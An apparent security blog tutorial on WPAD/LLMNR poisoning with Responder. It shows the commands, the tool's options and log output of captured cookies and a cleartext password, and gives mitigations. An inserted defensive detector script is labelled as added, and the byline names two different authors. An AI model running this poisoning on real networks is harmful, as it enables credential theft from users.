July 03, 2013
WPAD Man in the Middle (Clear Text Passwords)
Written by David Kennedy
This is a quick tutorial on a little trick that uses a configuration exposure to grab clear-text credentials. If you’re not already aware, there is a potential vulnerability in the way Internet Explorer is configured to “auto detect” its proxy settings. If “Automatically detect proxy settings” is checked in the proxy configuration tab, IE will generate a name-lookup request on the network, for a host named “WPAD”, on initialization.
On a corporate network, a DNS entry for “WPAD” should point to a proxy server that hosts a “wpad.dat” file, which tells Internet Explorer where to direct its Internet traffic. If that DNS query fails, the client falls back to WINS, and finally resorts to a local broadcast to try to find a host named “WPAD” on the network. On Windows Vista and later, this last request uses a protocol named Link-Local Multicast Name Resolution (LLMNR).
Here is where the dirty trick comes in. If we are on the same broadcast network as the client attempting to resolve this “WPAD” host, we can create a service that answers that request and claims that we are that host. Another dirty trick is to host the “wpad.dat” file on an HTTP server that requires basic authentication. Who doesn’t try re-entering their credentials when prompted on their corporate network, right?
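Because LLMNR reuses the DNS wire format, the fallback described above is easy to spot on the wire: a client that sends an LLMNR query for “wpad” has already failed DNS, and any LLMNR answer for that name comes from a host on the local segment claiming to be the proxy. The decoder below is an added example written for this post (it is not part of the original article or of the Responder project); it assumes access to raw UDP/5355 payloads, for instance from a packet capture, and builds its sample query and answer inline with the client and answering addresses taken from the session shown later in the post.

```python
"""Passive LLMNR decoder that flags name resolution for "wpad".

Added example, not part of the original post or of Responder. It assumes raw
UDP/5355 payloads (LLMNR is sent to the multicast group 224.0.0.252); the
packets used here are constructed inline so the script runs offline.
"""
import struct

LLMNR_PORT = 5355
SENSITIVE_NAMES = {"wpad"}  # names that should only ever resolve via DNS


def encode_name(name):
    """Encode a hostname in DNS label format (LLMNR uses the DNS wire format)."""
    out = b""
    for label in name.split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, offset):
    """Decode a label-formatted name at offset; return (name, offset after it).

    Compression pointers (0xC0 prefix) are followed so answer sections that
    point back at the question still decode.
    """
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            name, _ = decode_name(data, pointer)
            labels.append(name)
            return ".".join(labels), offset + 2
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_llmnr(payload):
    """Parse an LLMNR message into its id, QR bit, questions and answers."""
    msg_id, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    offset = 12
    questions = []
    for _ in range(qd):
        name, offset = decode_name(payload, offset)
        qtype, qclass = struct.unpack("!HH", payload[offset:offset + 4])
        offset += 4
        questions.append((name, qtype, qclass))
    answers = []
    for _ in range(an):
        name, offset = decode_name(payload, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", payload[offset:offset + 10])
        offset += 10
        rdata = payload[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:  # A record: render as dotted quad
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return {"id": msg_id, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def detect(packets):
    """packets: iterable of (src_ip, payload). Returns one alert string per finding."""
    alerts = []
    for src, payload in packets:
        msg = parse_llmnr(payload)
        if not msg["is_response"]:
            for name, _qtype, _qclass in msg["questions"]:
                if name.lower() in SENSITIVE_NAMES:
                    alerts.append(f"{src} queried LLMNR for '{name}': "
                                  "DNS lookup for WPAD failed on this client")
        else:
            for name, _rtype, _ttl, rdata in msg["answers"]:
                if name.lower() in SENSITIVE_NAMES:
                    alerts.append(f"{src} answered LLMNR for '{name}' with {rdata}: "
                                  "a host on this segment is claiming to be WPAD")
    return alerts


# --- constructed sample traffic (not captured data) -------------------------
def build_query(msg_id, name):
    header = struct.pack("!HHHHHH", msg_id, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def build_response(msg_id, name, ip):
    header = struct.pack("!HHHHHH", msg_id, 0x8000, 1, 1, 0, 0)  # QR bit set
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, 30, 4) + rdata
    return header + question + answer


SAMPLE_PACKETS = [
    ("192.168.81.139", build_query(0x1A2B, "wpad")),                      # client fallback
    ("192.168.81.168", build_response(0x1A2B, "wpad", "192.168.81.168")),  # rogue answer
    ("192.168.81.139", build_query(0x1A2C, "fileserver01")),              # benign LLMNR
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_PACKETS):
        print(alert)
```

Both alerts matter to a defender: the query alone shows that the DNS entry the mitigation section calls for is missing (or unreachable) for that client, and the answer pinpoints the address that is impersonating the proxy.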
So, the brilliant folks at SpiderLabs have provided us with an awesome utility, named Responder, that we can use to exploit the scenario described above. To install, clone the repository with Git.
All captured credentials are echoed to the console as well as saved to a text file in the same directory.
root@kali:/opt# git clone https://github.com/SpiderLabs/Responder.git
Cloning into 'Responder'...
remote: Counting objects: 82, done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 82 (delta 46), reused 80 (delta 45)
Unpacking objects: 100% (82/82), done.

Run the script with the “-h” argument to enumerate the available options.
root@kali:/opt/Responder# python Responder.py -h
Usage: python Responder.py -i 10.20.30.40 -b 1 -s On -r 0

Options:
  -h, --help            show this help message and exit
  -i 10.20.30.40, --ip=10.20.30.40
                        The ip address to redirect the traffic to. (usually yours)
  -b 0, --basic=0       Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication. This option is mandatory.
  -s Off, --http=Off    Set this to On or Off to start/stop the HTTP server. Default value is On
  --ssl=Off             Set this to On or Off to start/stop the HTTPS server. Default value is On
  -S Off, --smb=Off     Set this to On or Off to start/stop the SMB server. Default value is On
  -q Off, --sql=Off     Set this to On or Off to start/stop the SQL server. Default value is On
  -r 0, --wredir=0      Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' will). Default value is therefore set to Off (0)
  -c 1122334455667788, --challenge=1122334455667788
                        The server challenge to set for NTLM authentication. If not set, then defaults to 1122334455667788, the most common challenge for existing Rainbow Tables
  -l Responder-Session.log, --logfile=Responder-Session.log
                        Log file to use for Responder session.
  -f Off, --fingerprint=Off
                        This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
  -F On, --ftp=On       Set this to On or Off to start/stop the FTP server. Default value is On
  -L On, --ldap=On      Set this to On or Off to start/stop the LDAP server. Default value is On
  -D On, --dns=On       Set this to On or Off to start/stop the DNS server. Default value is On
  -w Off, --wpad=Off    Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is Off
  --lm=0                Set this to 1 if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False (0)

Now, we simply run the script with the basic authentication and WPAD modules enabled, sit back, and wait for the clear text creds to roll in.
root@kali:/opt/Responder# python Responder.py -i 192.168.81.168 -b 1 -w On
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:ON
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF

When the client attempts to access the Internet, a prompt is displayed for credentials. When entered, the credentials are captured and the client is redirected to the Internet.
LLMNR poisoned answer sent to this IP: 192.168.81.139. The requested name was : wpad.
LLMNR poisoned answer sent to this IP: 192.168.81.139. The requested name was : wpad.
[+]WPAD file sent to: 192.168.81.139
[+]WPAD file sent to: 192.168.81.139
[+]WPAD file sent to: 192.168.81.139
LLMNR poisoned answer sent to this IP: 192.168.81.139. The requested name was : wpadwpadwpad.
[+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.com/
[+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=cf041dac8a824658:U=378b2bd61a938327:FF=0:TM=1370374508:LM=1370374965:S=bGMJzuuLXRGW_FMG; NID=67=s5Du4EheeC4qgE8wCp1UpOV-qVFHLeRblrMBRtbsvSf_FJzu5HF6ukgcUx4l_g74TcqLJtS40PNxLB_qyxnCAoMw5VJ2A6pdYyZeco1cYfP35EjWDjCIpk0DdlQCkuhB
[+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.com/
[+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=cf041dac8a824658:U=378b2bd61a938327:FF=0:TM=1370374508:LM=1370374965:S=bGMJzuuLXRGW_FMG; NID=67=s5Du4EheeC4qgE8wCp1UpOV-qVFHLeRblrMBRtbsvSf_FJzu5HF6ukgcUx4l_g74TcqLJtS40PNxLB_qyxnCAoMw5VJ2A6pdYyZeco1cYfP35EjWDjCIpk0DdlQCkuhB
[+][Proxy]HTTP-User & Password: Spoonman:PleaseDon'tStealMyPassword!!!
[+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.co.uk/
[+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=133881244d00a360:U=695158418963de2f:FF=0:TM=1370374508:LM=1370374965:S=Z-zbOdxLlJKMAi9j; NID=67=ZAlxN3yhjTrFufC58FtofKUgd1EpBDH5V5KhdNoim_yGDDTMyyhvLdhYEevm84-Wg66zeHwGdnaFMzr_og0yJgjsNTpFeKo872exiCknsH4Nd1PRbm33Aa9W8oK-WBDa
[+][Proxy]HTTP-User & Password: Spoonman:PleaseDon'tStealMyPassword!!!
[+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.co.uk/gen_204?atyp=i&ct=&cad=&vet=10CAYQ-Cc&ei=GK6vUc-AM7L60gX9-4DwAw&zx=1370467867536
[+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=133881244d00a360:U=695158418963de2f:FF=0:TM=1370374508:LM=1370374965:S=Z-zbOdxLlJKMAi9j; NID=67=ZAlxN3yhjTrFufC58FtofKUgd1EpBDH5V5KhdNoim_yGDDTMyyhvLdhYEevm84-Wg66zeHwGdnaFMzr_og0yJgjsNTpFeKo872exiCknsH4Nd1PRbm33Aa9W8oK-WBDa
[+][Proxy]HTTP-User & Password: Spoonman:PleaseDon'tStealMyPassword!!!
[+]HTTP Proxy sent from: 192.168.81.139 The requested URL was: http://www.google.co.uk/gen_204?v=3&s=webhp&action=&e=17259,4000116,4001351,4001948,4002855,4003714,4004320,4004334,4004788,4004844,4004897,4004943,4004949,4004953,4004972,4005031,4005614,4005819,4005864,4005875,4005986,4006191,4006339,4006347,4006349,4006425,4006442,4006466,4006524,4006541,4006578,4006727,4007007,4007009,4007020,4007055,4007060,4007073,4007076,4007080,4007117,4007118,4007131,4007158,4007232,4007296,4007321,4007328,4007335,4007445,4007521,4007533&ei=GK6vUc-AM7L60gX9-4DwAw&imc=3&imn=3&imp=3&dM=10&atyp=csi&adh=&rt=xjsls.176,prt.178,ol.196,iml.182,xjses.363,xjsee.414,xjs.460,wsrt.23930,cst.0,dnst.0,rqst.236,rspt.143
[+]HTTP Cookie Header sent from: 192.168.81.139 The Cookie is: Cookie: PREF=ID=133881244d00a360:U=695158418963de2f:FF=0:TM=1370374508:LM=1370374965:S=Z-zbOdxLlJKMAi9j; NID=67=ZAlxN3yhjTrFufC58FtofKUgd1EpBDH5V5KhdNoim_yGDDTMyyhvLdhYEevm84-Wg66zeHwGdnaFMzr_og0yJgjsNTpFeKo872exiCknsH4Nd1PRbm33Aa9W8oK-WBDa
[+][Proxy]HTTP-User & Password: Spoonman:PleaseDon'tStealMyPassword!!!
root@kali:/opt/Responder# cat HTTP-Proxy-Clear-Text-Password-192.168.81.139.txt
Spoonman:PleaseDon'tStealMyPassword!!!

Now, how do we protect our corporate networks from this attack? The simplest solution is to create a DNS entry for “WPAD” that points to the corporate proxy server. Even if the server doesn’t actually host a “wpad.dat” file, an attacker won’t be able to exploit the client resolution process (unless, of course, the DNS server is compromised). Another solution is to disable “Automatically detect proxy settings” on all Internet Explorer clients, through Group Policy or any other configuration delivery method.

Now go, and be the Middle Man.

This blog post was written by Larry Spohn - Senior Security Consultant at TrustedSec.